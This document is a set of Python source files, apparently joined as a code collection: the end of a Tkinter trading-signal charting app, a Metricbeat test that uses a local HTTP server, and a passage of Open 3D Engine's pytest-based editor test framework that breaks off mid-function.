ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.CCI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(22222):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax1.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax2.plot(np.arange(len(data)), data.MACD, LW = 1.)
ax2.plot(np.arange(len(data)), data.MACD_HIST, LW = .5)
ax2.plot(np.arange(len(data)), data.MACD_SIGNAL, LW = .5)
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST >= 0), facecolor='#0fff97')
ax2.fill_between(data.index, data.MACD_HIST, 0, where=(data.MACD_HIST <= 0), facecolor='#ff400f')
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(33333):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2 = fig.subplots(2, 1, sharex = True, gridspec_kw={'height_ratios': [4, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
candlestick2_ohlc(ax1, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax1.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax1.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(np.arange(len(data)), data.HCCI, LW = 1., color = '#e64af0')
ax2.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax2.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(44444):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.CCI, LW = 1., color = '#e64af0')
ax1.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax1.legend(loc = 1)
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.HCCI, LW = 1., color = '#e64af0')
ax3.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
elif grabstrategy == str(55555):
fig = Figure(figsize=self.figsize, dpi = 100)
ax1, ax2, ax3 = fig.subplots(3, 1, sharex = True, gridspec_kw={'height_ratios': [1, 3, 1], 'wspace': 0, 'hspace': 0})
data = self.multiIndicatorSignal(data)
ax1.plot(np.arange(len(data)), data.CCI, LW = 1., color = '#e64af0')
ax1.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax1.legend(loc = 1)
candlestick2_ohlc(ax2, data.Open, data.High, data.Low, data.Close, colorup='g', width = candlewidth)
ax2.plot(data.loc[data.viewSignal == -1.0].index, data[['Close']][data.viewSignal == -1], 'v', markersize = markersize, color = 'r')
ax2.plot(data.loc[data.viewSignal == 1.0].index, data[['Close']][data.viewSignal == 1], '^', markersize = markersize, color = 'g')
ax2.plot(data.loc[data.viewSignal == 2.0].index, data[['Close']][data.viewSignal == 2], 'o', markersize = markersize, color = '#181c1c')
ax3.plot(np.arange(len(data)), data.HCCI, LW = 1., color = '#e64af0')
ax3.fill_between(data.index, y1=-100, y2=100, color='#f6b4fa', alpha='0.3')
ax3.legend(loc = 1)
fig.set_tight_layout(True)
canvas = FigureCanvasTkAgg(fig, frameplot)
canvas.draw()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
toolbar = NavigationToolbar2Tk(canvas, frameplot)
toolbar.update()
canvas.get_tk_widget().pack(fill = tk.BOTH, expand = True)
else:
return None
frameplot.grid(row = 2, column = 0)
#%%
if __name__ == '__main__':
import multiprocessing
import time
import datetime
path = {'mainPath': '/home/kenneth/Documents/GIT_PROJECTS/AI-Signal-Generator',
'acountPath': 'DOCS/account_id.txt',
'tokenPath': 'DOCS/token.txt',
'telegram': 'DOCS/telegram.txt',
'predicted': 'PREDICTED',
'signals': 'SIGNALS',
'start': '2019-04-01T00:00:00Z',
'end': str(datetime.datetime.utcnow().isoformat('T')[:-7] +'Z'),
'environment': 'live',
'strategy': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '11',
'22', '33', '44', '55', '66', '77', '88', '99', '111',
'222', '333', '444', '555', '666', '777', '888', '999', '1111',
'2222', '3333', '4444', '5555', '6666', '7777', '8888', '9999',
'11111', '22222', '33333', '44444', '55555'],
'instruments': 'AUD_USD,BCO_USD,BTC_USD,DE30_EUR,EUR_AUD,EUR_JPY,EUR_USD,GBP_JPY,GBP_USD,'+\
'NAS100_USD,SPX500_USD,US30_USD,USD_CAD,USD_JPY,XAU_USD',
'timeframes': ['M15', 'M30', 'H1', 'H2', 'H3', 'H4', 'H6', 'H8',
'H12', 'D', 'W']}
#tkinter mainloop
def steamerloop(path):
root = tk.Tk()
root.title("AI Signal Generator")
root.option_add("*Font", "Calibri 10 bold")
#style
s = ttk.Style()
s.theme_create( "MyStyle", parent="alt", settings={
"TNotebook": {"configure": {"tabmargins": [2, 5, 2, 0] } },
"TNotebook.Tab": {"configure": {"padding": [50, 10],
"font" : ('Calibri', '10', 'bold')},}})
s.theme_use("MyStyle")
tabSpace = ttk.Notebook(root)
firstFrame = ttk.Frame(tabSpace)
secondFrame = ttk.Frame(tabSpace)
thirdFrame = ttk.Frame(tabSpace)
#--signal
streamSignal(firstFrame, path).pack()
#--visualization
visu(secondFrame, path).pack()
#--Returns
Returns(thirdFrame, path).pack()
#--Notebooks
tabSpace.add(firstFrame, text = 'Automated signal')
tabSpace.add(secondFrame, text = 'Visualize signals')
tabSpace.add(thirdFrame, text = 'Recommendation')
tabSpace.pack()
root.resizable(0,0)
root.mainloop()
#queue tkinter app
def mainloop(function, arg, queue):
queue.put(function(arg))
q = Queue()
multiprocessing.Process(target = mainloop, args=(steamerloop, path, q)).start()
|
test_lightmodules.py
|
import http.server
import metricbeat
import os
import os.path
import platform
import shutil
import sys
import threading
import unittest
import json
from contextlib import contextmanager
class Test(metricbeat.BaseTest):
@unittest.skipIf(platform.platform().startswith("Windows-10"),
"flaky test: https://github.com/elastic/beats/issues/26181")
def test_processors(self):
shutil.copytree(
os.path.join(self.beat_path, "mb/testing/testdata/lightmodules"),
os.path.join(self.working_dir, "module"),
)
with http_test_server() as server:
self.render_config_template(modules=[{
"name": "test",
"metricsets": ["json"],
"namespace": "test",
# Hard-coding 'localhost' because hostname in server.server_name doesn't always work.
"hosts": [f"localhost:{server.server_port}"],
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
self.assert_no_logged_warnings()
output = self.read_output_json()
self.assertGreater(len(output), 0)
for evt in output:
self.assertEqual(evt["fields"]["test"], "fromprocessor")
@contextmanager
def http_test_server():
server = http.server.HTTPServer(('localhost', 0), TestHTTPHandler)
child = threading.Thread(target=server.serve_forever)
child.start()
yield server
server.shutdown()
child.join()
class TestHTTPHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"foo": "bar"}).encode("utf-8"))
|
editor_test.py
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
import pytest
from _pytest.skipping import pytest_runtest_setup as skipping_pytest_runtest_setup
import inspect
from typing import List
from abc import ABC
from inspect import getmembers, isclass
import os, sys
import threading
import inspect
import math
import json
import logging
import types
import functools
import re
import ly_test_tools.environment.file_system as file_system
import ly_test_tools.environment.waiter as waiter
import ly_test_tools.environment.process_utils as process_utils
from ly_test_tools.o3de.asset_processor import AssetProcessor
from ly_test_tools.launchers.exceptions import WaitTimeoutError
from . import editor_test_utils as editor_utils
# This file provides editor testing functionality to easily write automated editor tests for O3DE.
# For using these utilities, you can subclass your test suite from EditorTestSuite, this allows an easy way of specifying
# python test scripts that the editor will run without needing to write any boilerplace code.
# It supports out of the box parallelization(running multiple editor instances at once), batching(running multiple tests in the same editor instance) and
# crash detection.
# Usage example:
# class MyTestSuite(EditorTestSuite):
#
# class MyFirstTest(EditorSingleTest):
# from . import script_to_be_run_by_editor as test_module
#
# class MyTestInParallel_1(EditorParallelTest):
# from . import another_script_to_be_run_by_editor as test_module
#
# class MyTestInParallel_2(EditorParallelTest):
# from . import yet_another_script_to_be_run_by_editor as test_module
#
#
# EditorTestSuite does introspection of the defined classes inside of it and automatically prepares the tests, parallelizing/batching as required
# This file contains no tests, but with this we make sure it won't be picked up by the runner since the file ends with _test
__test__ = False
# Abstract base class for an editor test.
class EditorTestBase(ABC):
# Maximum time for run, in seconds
timeout = 180
# Test file that this test will run
test_module = None
# Test that will be run alone in one editor
class EditorSingleTest(EditorTestBase):
# Extra cmdline arguments to supply to the editor for the test
extra_cmdline_args = []
# Custom setup function, will run before the test
@staticmethod
def setup(instance, request, workspace, editor, editor_test_results, launcher_platform):
pass
# Custom run wrapping. The code before yield will run before the test, and after the yield after the test
@staticmethod
def wrap_run(instance, request, workspace, editor, editor_test_results, launcher_platform):
yield
# Custom teardown function, will run after the test
@staticmethod
def teardown(instance, request, workspace, editor, editor_test_results, launcher_platform):
pass
# Test that will be both be run in parallel and batched with eachother in a single editor.
# Does not support per test setup/teardown for avoiding any possible race conditions
class EditorSharedTest(EditorTestBase):
# Specifies if the test can be batched in the same editor
is_batchable = True
# Specifies if the test can be run in multiple editors in parallel
is_parallelizable = True
# Test that will be only run in parallel editors.
class EditorParallelTest(EditorSharedTest):
is_batchable = False
is_parallelizable = True
# Test that will be batched along with the other batched tests in the same editor.
class EditorBatchedTest(EditorSharedTest):
is_batchable = True
is_parallelizable = False
class Result:
class Base:
def get_output_str(self):
if hasattr(self, "output") and self.output is not None:
return self.output
else:
return "-- No output --"
def get_editor_log_str(self):
if hasattr(self, "editor_log") and self.editor_log is not None:
return self.editor_log
else:
return "-- No editor log found --"
class Pass(Base):
@classmethod
def create(cls, output : str, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test Passed\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
)
return output
class Fail(Base):
@classmethod
def create(cls, output, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test FAILED\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Crash(Base):
@classmethod
def create(cls, output : str, ret_code : int, stacktrace : str, editor_log : str):
r = cls()
r.output = output
r.ret_code = ret_code
r.stacktrace = stacktrace
r.editor_log = editor_log
return r
def __str__(self):
stacktrace_str = "-- No stacktrace data found --" if not self.stacktrace else self.stacktrace
output = (
f"Test CRASHED, return code {hex(self.ret_code)}\n"
f"---------------\n"
f"| Stacktrace |\n"
f"---------------\n"
f"{stacktrace_str}"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
crash_str = "-- No crash information found --"
return output
class Timeout(Base):
@classmethod
def create(cls, output : str, time_secs : float, editor_log : str):
r = cls()
r.output = output
r.time_secs = time_secs
r.editor_log = editor_log
return r
def __str__(self):
output = (
f"Test TIMED OUT after {self.time_secs} seconds\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
class Unknown(Base):
@classmethod
def create(cls, output : str, extra_info : str, editor_log : str):
r = cls()
r.output = output
r.editor_log = editor_log
r.extra_info = extra_info
return r
def __str__(self):
output = (
f"Unknown test result, possible cause: {self.extra_info}\n"
f"------------\n"
f"| Output |\n"
f"------------\n"
f"{self.get_output_str()}\n"
f"--------------\n"
f"| Editor log |\n"
f"--------------\n"
f"{self.get_editor_log_str()}\n"
)
return output
@pytest.mark.parametrize("crash_log_watchdog", [("raise_on_crash", False)])
class EditorTestSuite():
#- Configurable params -#
# Extra cmdline arguments to supply for every editor instance for this test suite
global_extra_cmdline_args = ["-BatchMode", "-autotest_mode"]
# Tests usually run with no renderer, however some tests require a renderer
use_null_renderer = True
# Maximum time for a single editor to stay open on a shared test
timeout_editor_shared_test = 300
# Function to calculate number of editors to run in parallel, this can be overriden by the user
@staticmethod
def get_number_parallel_editors():
return 8
## Internal ##
_TIMEOUT_CRASH_LOG = 20 # Maximum time (seconds) for waiting for a crash file, in secondss
_TEST_FAIL_RETCODE = 0xF # Return code for test failure
_asset_processor = None
_results = {}
@pytest.fixture(scope="class")
def editor_test_results(self, request):
results = {}
return results
class Runner():
def __init__(self, name, func, tests):
self.name = name
self.func = func
self.tests = tests
self.run_pytestfunc = None
self.result_pytestfuncs = []
# Custom collector class. This collector is where the magic happens, it programatically adds the test functions
# to the class based on the test specifications used in the TestSuite class.
class EditorTestClass(pytest.Class):
def collect(self):
cls = self.obj
# This collector does the following:
# 1) Iterates through all the EditorSingleTest subclasses defined inside the suite.
# With these, it adds a test function to the suite per each, that will run the test using the specs
# 2) Iterates through all the EditorSharedTest subclasses defined inside the suite.
# The subclasses then are grouped based on the specs in by 3 categories:
# batched, parallel and batched+parallel.
# Each category will have a test runner function associated that will run all the tests of the category,
# then a result function will be added for every test, which will pass/fail based on what happened in the previos
# runner function
# Decorator function to add extra lookup information for the test functions
def set_marks(marks):
def spec_impl(func):
@functools.wraps(func)
def inner(*args, **argv):
return func(*args, **argv)
inner.marks = marks
return inner
return spec_impl
# Retrieve the test specs
single_tests = self.obj.get_single_tests()
shared_tests = self.obj.get_shared_tests()
batched_tests = cls.filter_shared_tests(shared_tests, is_batchable=True)
parallel_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True)
parallel_batched_tests = cls.filter_shared_tests(shared_tests, is_parallelizable=True, is_batchable=True)
# If user provides option to not parallelize/batch the tests, move them into single tests
no_parallelize = self.config.getoption("--no-editor-parallel", default=False)
no_batch = self.config.getoption("--no-editor-batch", default=False)
if no_parallelize:
single_tests += parallel_tests
parallel_tests = []
batched_tests += parallel_batched_tests
parallel_batched_tests = []
if no_batch:
single_tests += batched_tests
batched_tests = []
parallel_tests += parallel_batched_tests
parallel_batched_tests = []
# Add the single tests, these will run normally
for test_spec in single_tests:
name = test_spec.__name__
def make_test_func(name, test_spec):
@set_marks({"run_type" : "run_single"})
def single_run(self, request, workspace, editor, editor_test_results, launcher_platform):
# only single tests are allowed to have setup/teardown, however we can have shared tests that
# were explicitly set as single, for example via cmdline argument override
is_single_test = issubclass(test_spec, EditorSingleTest)
if is_single_test:
# Setup step for wrap_run
wrap = test_spec.wrap_run(self, request, workspace, editor, editor_test_results, launcher_platform)
assert isinstance(wrap, types.GeneratorType), "wrap_run must return a generator, did you forget 'yield'?"
next(wrap, None)
# Setup step
test_spec.setup(self, request, workspace, editor, editor_test_results, launcher_platform)
# Run
self._run_single_test(request, workspace, editor, editor_test_results, test_spec)
if is_single_test:
# Teardown
test_spec.teardown(self, request, workspace, editor, editor_test_results, launcher_platform)
# Teardown step for wrap_run
next(wrap, None)
return single_run
setattr(self.obj, name, make_test_func(name, test_spec))
f = make_test_func(name, test_spec)
if hasattr(test_spec, "pytestmark"):
f.pytestmark = test_spec.pytestmark
setattr(self.obj, name, f)
# Add the shared tests, for these we will create a runner class for storing the run information
# that will be later used for selecting what tests runners will be run
runners = []
def create_runner(name, function, tests):
runner = EditorTestSuite.Runner(name, function, tests)
def make_func():
@set_marks({"runner" : runner, "run_type" : "run_shared"})
def shared_run(self, request, workspace, editor, editor_test_results, launcher_platform):
getattr(self, function.__name__)(request, workspace, editor, editor_test_results, runner.tests)
return shared_run
setattr(self.obj, name, make_func())
# Add the shared tests results, these just succeed/fail based what happened on the Runner.
for test_spec in tests:
def make_func(test_spec):
@set_marks({"runner" : runner, "test_spec" : test_spec, "run_type" : "result"})
def result(self, request, workspace, editor, editor_test_results, launcher_platform):
# The runner must have filled the editor_test_results dict fixture for this test.
# Hitting this assert could mean if there was an error executing the runner
assert test_spec.__name__ in editor_test_results, f"No run data for test: {test_spec.__name__}."
cls._report_result(test_spec.__name__, editor_test_results[test_spec.__name__])
return result
result_func = make_func(test_spec)
if hasattr(test_spec, "pytestmark"):
result_func.pytestmark = test_spec.pytestmark
setattr(self.obj, test_spec.__name__, result_func)
runners.append(runner)
create_runner("run_batched_tests", cls._run_batched_tests, batched_tests)
create_runner("run_parallel_tests", cls._run_parallel_tests, parallel_tests)
create_runner("run_parallel_batched_tests", cls._run_parallel_batched_tests, parallel_batched_tests)
# Now that we have added all the functions to the class, we will run
# a class test collection to retrieve all the tests.
instance = super().collect()[0]
# Override the istestfunction for the object, with this we make sure that the
# runners are always collected, even if they don't follow the "test_" naming
original_istestfunction = instance.istestfunction
def istestfunction(self, obj, name):
ret = original_istestfunction(obj, name)
if not ret:
ret = hasattr(obj, "marks")
return ret
instance.istestfunction = types.MethodType(istestfunction, instance)
collection = instance.collect()
def get_func_run_type(f):
return getattr(f, "marks", {}).setdefault("run_type", None)
collected_run_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "run_shared"
]
collected_result_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "result"
]
# We'll remove and store the runner functions for later, this way they won't
# be deselected by any filtering mechanism. The result functions for these we are actually
# interested on them to be filtered to tell what is the final subset of tests to run
collection = [
item for item in collection if item not in (collected_run_pytestfuncs)
]
# Match each generated pytestfunctions with every runner and store them
for run_pytestfunc in collected_run_pytestfuncs:
runner = run_pytestfunc.function.marks["runner"]
runner.run_pytestfunc = run_pytestfunc
for result_pytestfunc in collected_result_pytestfuncs:
runner = result_pytestfunc.function.marks["runner"]
runner.result_pytestfuncs.append(result_pytestfunc)
self.obj._runners = runners
return collection
@staticmethod
def pytest_custom_makeitem(collector, name, obj):
return EditorTestSuite.EditorTestClass(name, collector)
@classmethod
def pytest_custom_modify_items(cls, session, items, config):
# Add here the runners functions and filter the tests that will be run.
# The runners will be added if they have any selected tests
new_items = []
for runner in cls._runners:
runner.tests[:] = cls.filter_session_shared_tests(items, runner.tests)
if len(runner.tests) > 0:
new_items.append(runner.run_pytestfunc)
# Re-order dependent tests so they are run just after the runner
for result_pytestfunc in runner.result_pytestfuncs:
found_test = next((item for item in items if item == result_pytestfunc), None)
if found_test:
items.remove(found_test)
new_items.append(found_test)
items[:] = items + new_items
@classmethod
def get_single_tests(cls):
single_tests = [c[1] for c in cls.__dict__.items() if inspect.isclass(c[1]) and issubclass(c[1], EditorSingleTest)]
return single_tests
@classmethod
def get_shared_tests(cls):
shared_tests = [c[1] for c in cls.__dict__.items() if inspect.isclass(c[1]) and issubclass(c[1], EditorSharedTest)]
return shared_tests
@classmethod
def get_session_shared_tests(cls, session):
shared_tests = cls.get_shared_tests()
return cls.filter_session_shared_tests(session, shared_tests)
@staticmethod
def filter_session_shared_tests(session_items, shared_tests):
# Retrieve the test sub-set that was collected
# this can be less than the original set if were overriden via -k argument or similars
def will_run(item):
try:
skipping_pytest_runtest_setup(item)
return True
except:
return False
session_items_by_name = { item.originalname:item for item in session_items }
selected_shared_tests = [test for test in shared_tests if test.__name__ in session_items_by_name.keys() and will_run(session_items_by_name[test.__name__])]
return selected_shared_tests
@staticmethod
def filter_shared_tests(shared_tests, is_batchable=False, is_parallelizable=False):
# Retrieve the test sub-set that was collected
# this can be less than the original set if were overriden via -k argument or similars
return [
t for t in shared_tests if (
getattr(t, "is_batchable", None) is is_batchable
and
getattr(t, "is_parallelizable", None) is is_parallelizable
)
]
def setup_class(cls):
cls._asset_processor = None
def teardown_class(cls):
if cls._asset_processor:
cls._asset_processor.stop(1)
cls._asset_processor.teardown()
cls._asset_processor = None
editor_utils.kill_all_ly_processes(include_asset_processor=True)
else:
editor_utils.kill_all_ly_processes(include_asset_processor=False)
### Utils ###
# Prepares the asset processor for the test
def _prepare_asset_processor(self, workspace):
try:
# Start-up an asset processor if we are not running one
# If another AP process exist, don't kill it, as we don't own it
if self._asset_processor is None:
if not process_utils.process_exists("AssetProcessor", ignore_extensions=True):
editor_utils.kill_all_ly_processes()
self._asset_processor = AssetProcessor(workspace)
self._asset_processor.start()
else:
editor_utils.kill_all_ly_processes(include_asset_processor=False)
else:
# Make sure the asset processor from before wasn't closed by accident
self._asset_processor.start()
except Exception as ex:
self._asset_processor = None
raise ex
def _setup_editor_test(self, editor, workspace):
self._prepare_asset_processor(workspace)
editor_utils.kill_all_ly_processes(include_asset_processor=False)
editor.configure_settings()
# Utility function for parsing the output information from the editor.
# It deserializes the JSON content printed in the output for every test and returns that information.
@staticmethod
def _get_results_using_output(test_spec_list, output, editor_log_content):
results = {}
pattern = re.compile(r"JSON_START\((.+?)\)JSON_END")
out_matches = pattern.finditer(output)
found_jsons = {}
for m in out_matches:
try:
elem = json.loads(m.groups()[0])
found_jsons[elem["name"]] = elem
except Exception:
continue # Avoid to fail if the output data is corrupt
# Try to find the element in the log, this is used for cutting the log contents later
log_matches = pattern.finditer(editor_log_content)
for m in log_matches:
try:
elem = json.loads(m.groups()[0])
if elem["name"] in found_jsons:
found_jsons[elem["name"]]["log_match"] = m
except Exception:
continue # Avoid to fail if the log data is corrupt
log_start = 0
for test_spec in test_spec_list:
name = editor_utils.get_module_filename(test_spec.test_module)
if name not in found_jsons.keys():
results[test_spec.__name__] = Result.Unknown.create(output, "Couldn't find any test run information on stdout", editor_log_content)
else:
result = None
json_result = found_jsons[name]
json_output = json_result["output"]
# Cut the editor log so it only has the output for this run
m = json_result["log_match"]
end = m.end() if test_spec != test_spec_list[-1] else -1
cur_log = editor_log_content[log_start : end]
log_start = end
if json_result["success"]:
result = Result.Pass.create(json_output, cur_log)
else:
result = Result.Fail.create(json_output, cur_log)
results[test_spec.__name__] = result
return results
# Fails the test if the test result is not a PASS, specifying the information
@staticmethod
def _report_result(name : str, result : Result.Base):
if isinstance(result, Result.Pass):
output_str = f"Test {name}:\n{str(result)}"
print(output_str)
else:
error_str = f"Test {name}:\n{str(result)}"
pytest.fail(error_str)
### Running tests ###
# Starts the editor with the given test and retuns an result dict with a single element specifying the result
def _exec_editor_test(self, request, workspace, editor, run_id : int, log_name : str,
test_spec : EditorTestBase, cmdline_args : List[str] = []):
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
test_result = None
results = {}
test_filename = editor_utils.get_testcase_module_filepath(test_spec.test_module)
cmdline = [
"--runpythontest", test_filename,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles = False, launch_ap = False, configure_settings=False)
try:
editor.wait(test_spec.timeout)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
if return_code == 0:
test_result = Result.Pass.create(output, editor_log_content)
else:
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
test_result = Result.Crash.create(output, return_code, editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG), None)
editor_utils.cycle_crash_report(run_id, workspace)
else:
test_result = Result.Fail.create(output, editor_log_content)
except WaitTimeoutError:
editor.kill()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
test_result = Result.Timeout.create(output, test_spec.timeout, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
results = self._get_results_using_output([test_spec], output, editor_log_content)
results[test_spec.__name__] = test_result
return results
# Starts an editor executable with a list of tests and returns a dict of the result of every test ran within that editor
# instance. In case of failure this function also parses the editor output to find out what specific tests that failed
def _exec_editor_multitest(self, request, workspace, editor, run_id : int, log_name : str,
test_spec_list : List[EditorTestBase], cmdline_args=[]):
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
results = {}
test_filenames_str = ";".join(editor_utils.get_testcase_module_filepath(test_spec.test_module) for test_spec in test_spec_list)
cmdline = [
"--runpythontest", test_filenames_str,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles = False, launch_ap = False, configure_settings=False)
output = ""
editor_log_content = ""
try:
editor.wait(self.timeout_editor_shared_test)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
if return_code == 0:
# No need to scrap the output, as all the tests have passed
for test_spec in test_spec_list:
results[test_spec.__name__] = Result.Pass.create(output, editor_log_content)
else:
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crashed_test = None
for key, result in results.items():
if isinstance(result, Result.Unknown):
if not crashed_test:
crash_error = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
editor_utils.cycle_crash_report(run_id, workspace)
results[key] = Result.Crash.create(output, return_code, crash_error, result.editor_log)
crashed_test = results[key]
else:
results[key] = Result.Unknown.create(output, f"This test has unknown result, test '{crashed_test.__name__}' crashed before this test could be executed", result.editor_log)
except WaitTimeoutError:
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
editor.kill()
for key, result in results.items():
if isinstance(result, Result.Unknown):
results[key] = Result.Timeout.create(result.output, total_timeout, result.editor_log)
return results
# Runs a single test with the given specs, used by the collector to register the test
def _run_single_test(self, request, workspace, editor, editor_test_results, test_spec : EditorTestBase):
self._setup_editor_test(editor, workspace)
extra_cmdline_args = []
if hasattr(test_spec, "extra_cmdline_args"):
extra_cmdline_args = test_spec.extra_cmdline_args
results = self._exec_editor_test(request, workspace, editor, 1, "editor_test.log", test_spec, extra_cmdline_args)
if not hasattr(self.__class__, "_results"):
self.__class__._results = {}
editor_test_results.update(results)
test_name, test_result = next(iter(results.items()))
self._report_result(test_name, test_result)
# Runs a batch of tests in one single editor with the given spec list
def _run_batched_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
results = self._exec_editor_multitest(request, workspace, editor, 1, "editor_test.log", test_spec_list, extra_cmdline_args)
assert results is not None
editor_test_results.update(results)
# Runs multiple editors with one test on each editor
def _run_parallel_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
parallel_editors = self._get_number_parallel_editors(request)
assert parallel_editors > 0, "Must have at least one editor"
# If there are more tests than max parallel editors, we will split them into multiple consecutive runs
